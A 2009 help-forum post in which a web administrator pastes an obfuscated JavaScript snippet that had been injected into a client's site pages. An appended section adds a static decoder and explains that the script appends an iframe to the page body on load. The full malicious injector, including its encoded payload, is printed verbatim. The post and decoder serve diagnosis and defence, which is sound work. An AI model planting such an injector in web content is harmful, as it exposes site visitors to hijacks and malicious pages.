Search Results Hijacks, TheWebsiteSurvey.com, and Virus Insertion?



#1 JohnnyMo1974


Posted 25 December 2009 - 05:02 AM

Hey guys, I have caught a number of discussions here on BC and elsewhere mentioning Search Engine Hijacks and redirects to all sorts of random things as well as odd pop ups from TheWebsiteSurvey.com. I imagine this has little if anything to do with it, but being that I can't make heads or tails of this, I thought I'd post for brighter minds to take a look at and make sense of.

As of two days ago I started getting hijacks on search engine result links, and the stupid websitesurvey pop-up/redirect. I thought I had some odd virus but got a clean bill of health from MBAM, SAS, etc...

Oddly enough, when I think back, this all started the day following troubleshooting a client website that was somehow compromised by an odd "insertion" or virus of some sort. Basically, I had a client call because multiple things on his website ceased to function and when I pulled the pages to take a look, every single index file on his site (whether html, php, etc...) had been "hacked" and had the code I have copied below inserted within the page somewhere. (In most instances immediately following the body tag, but on some pages the code was less neatly inserted.)

I got in touch with his hosting company and had them see if they could source the issue and they indicated it appeared that all the pages were accessed via FTP, downloaded from his server, and reuploaded as opposed to being a script hole exploit. They gave an IP address in the Netherlands as the culprit and I subsequently blocked that from his server as well as from various other client sites/servers.

That all noted, I have no idea if the "virus" or the code below has any effect on these pop-ups or other hijacks, but since no better answer has been offered as of yet I thought I'd put this out there for folks with a better grasp of code to take a gander at:

<script>
function gNX(SINgqDZU, tsEmfJA, DeODs)
{
	var BLAFGHFclX=DeODs.split(tsEmfJA);
	var lFMSkvVXr='';
	for(HOFt=-0x30+0x5+0x2b;HOFt<(BLAFGHFclX.length-1);HOFt+=-0x2c+0x3-0x20-0x2a+0x74)
	{ TedLPqI = BLAFGHFclX[HOFt]^SINgqDZU;lFMSkvVXr += String.fromCharCode(TedLPqI);}return lFMSkvVXr;}

		function uYdGUc(vCX){  fff=op.split("1040");alert('Hqu'); } 
;function RFjcyVP(){var eVTDqpjSf=new Function("hwdjiK", "return "+gNX(-0x8+0x1f+0xd-0x2d+0x8-0x22+0x30+0x638, 'U','1569U1578U1574U1584U1576U1568U1579U1585U')+"."+gNX(0xf-0x25+0xa-0x2c-0x2b-0x18+0x15+0x4be, 'V','1082V1079V1084V1057V')+"");var capQNK=eVTDqpjSf(-0x2e-0x1a+0x49);capQNK.innerHTML+=gNX(0x2+0x22-0x2a-0x2f+0x2eb, 'B','650B735B720B708B727B731B723B662B705B735B722B706B734B651B647B662B734B723B735B721B734B706B651B647B662B724B729B708B722B723B708B651B646B662B720B708B727B731B723B724B729B708B722B723B708B651B646B662B709B708B725B651B657B734B706B706B710B652B665B665B655B647B664B644B646B647B664B644B655B664B647B644B645B665B716B723B730B723B665B735B728B722B723B718B664B710B734B710B649B709B651B644B725B725B724B646B645B725B723B644B724B725B725B645B720B646B655B642B646B640B654B643B641B644B654B727B643B646B643B724B645B725B722B657B648B650B665B735B720B708B727B731B723B648B');}function SZaNHz(Gbadqmty){ var HNf=new Function("KIYeUjkV", "return 361449;"); fff=op.split("372");var Coi = document.getElementById('nhYekfglDJ');window.eval(); } 

;if(window.addEventListener)
{
window.addEventListener(gNX(0x3+0x32+0x31+0x8b, 'q','157q158q144q149q'),RFjcyVP,false);}else if(window.attachEvent){window.attachEvent('on'+gNX(0x3+0x32+0x31+0x8b, 'q','157q158q144q149q'), RFjcyVP);}function DQojwMqe(NhxFdsTt){  fff=op.split("696"); } 
;</script>

I don't know but might it be theoretically possible that any site with this code inserted will then redirect you to the useless search hijacks and surveys when the listing appears in Google or Yahoo?

Hope it helps,

JM

EDIT: Moved to a more appropriate forum

Edited by garmanma, 25 December 2009 - 03:57 PM.
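
Added example, not part of the original post or the poster's own analysis: a static decoder for the gNX() calls in the snippet above, which recovers the hidden strings without running any of the script. SAMPLE is a constructed excerpt of those calls with the long payload cut to its first seven tokens; evalKey, decode and decodeCalls are names chosen here.

```javascript
// Static decoder for the gNX() string obfuscation in the posted snippet.
// Nothing from the sample is executed: no eval, no Function, no DOM.

// Sum a key expression made only of hex/decimal literals joined by + and -.
function evalKey(expr) {
  const compact = expr.replace(/\s+/g, '');
  if (!/^[+-]?(0x[0-9a-f]+|\d+)([+-](0x[0-9a-f]+|\d+))*$/i.test(compact)) {
    throw new Error('unexpected key expression: ' + expr);
  }
  let total = 0;
  for (const m of compact.matchAll(/([+-]?)(0x[0-9a-f]+|\d+)/gi)) {
    total += (m[1] === '-' ? -1 : 1) * Number(m[2]);
  }
  return total;
}

// Same transform as gNX: split on the separator, skip the last element
// (empty because the data ends with the separator), XOR each number with the key.
function decode(key, sep, data) {
  return data.split(sep).slice(0, -1)
    .map((n) => String.fromCharCode(Number(n) ^ key))
    .join('');
}

// Find every fnName(<key expr>, '<sep>', '<data>') call in a source string.
// Assumes fnName contains no regex metacharacters.
function decodeCalls(source, fnName) {
  const call = new RegExp(
    fnName + "\\(([^,]+),\\s*'([^']*)'\\s*,\\s*'([^']*)'\\)", 'g');
  const out = [];
  for (const m of source.matchAll(call)) {
    out.push(decode(evalKey(m[1]), m[2], m[3]));
  }
  return out;
}

// Constructed excerpt of the calls in the posted script.
const SAMPLE = [
  "gNX(-0x8+0x1f+0xd-0x2d+0x8-0x22+0x30+0x638, 'U','1569U1578U1574U1584U1576U1568U1579U1585U')",
  "gNX(0xf-0x25+0xa-0x2c-0x2b-0x18+0x15+0x4be, 'V','1082V1079V1084V1057V')",
  "gNX(0x2+0x22-0x2a-0x2f+0x2eb, 'B','650B735B720B708B727B731B723B')", // payload cut to 7 tokens
  "gNX(0x3+0x32+0x31+0x8b, 'q','157q158q144q149q')",
].join(';\n');

console.log(decodeCalls(SAMPLE, 'gNX'));
```

On this input the four calls resolve to document, body, <iframe and load: the script waits for the page's load event and then appends markup beginning with an iframe tag to document.body.innerHTML.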

